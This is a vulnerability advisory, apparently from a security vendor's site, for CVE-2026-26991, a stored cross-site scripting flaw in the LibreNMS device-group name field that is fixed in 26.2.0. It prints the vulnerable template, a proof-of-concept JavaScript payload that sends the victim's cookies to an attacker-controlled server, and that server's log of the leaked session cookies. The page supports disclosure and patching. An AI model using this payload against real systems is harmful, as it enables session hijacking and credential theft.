CVE-2026-26991

CVE-2026-26991 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0.

Summary

/device-groups name Stored Cross-Site Scripting

  • HTTP POST
  • Request-URI(s): "/device-groups"
  • Vulnerable parameter(s): "name"
  • Attacker must be authenticated with "admin" privileges.
  • When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter.
  • After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.

Details

The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/device-group/index.blade.php:

@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id)
}}')"> // using the device's name in the Delete button functionality without
sanitizing for XSS related characters/strings

As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored
cross-site scripting.

PoC

  • Login
  • Select Devices > Manage Groups
  • Select New Device Group
  • Input 12345');var pt=new Image();pt.src='http:///cookie-
  • '.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into
  • the "Name" input box (change to be an the IP of an attacker controlled webserver)
  • Select "access_points.accesspoint_id" as the Conditional input
  • Input 1 into the Conditional value input box
  • Select Save
  • Select the Delete Icon for the newly created Device Group
  • Select OK
  • The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled
  • server, leaking the user's cookies.

Impact

Attacker Controlled server's logs:

192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie-
jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai

l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh

LnQxXHlpw3abw4C74y%22%5D;%20XSRF-
TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL

Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj
BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0
ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG
I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/144.0.0.0 Safari/537.36"

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

librenms/librenms (< 26.2.0)

Security releases

librenms/librenms → 26.2.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade librenms/librenms to 26.2.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-26991? CVE-2026-26991 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of librenms/librenms are affected by CVE-2026-26991? librenms/librenms (composer) versions < 26.2.0 is affected.
  3. Is there a fix for CVE-2026-26991? Yes. CVE-2026-26991 is fixed in 26.2.0. Upgrade to this version or later.
  4. Is CVE-2026-26991 exploitable, and should I be worried? Whether CVE-2026-26991 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-26991 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-26991? Upgrade librenms/librenms to 26.2.0 or later.

Other vulnerabilities in librenms/librenms

CVE-2026-6204CVE-2026-26990CVE-2026-26989CVE-2026-26988CVE-2026-27016

Stop the waste.
Protect your environment with Kodem.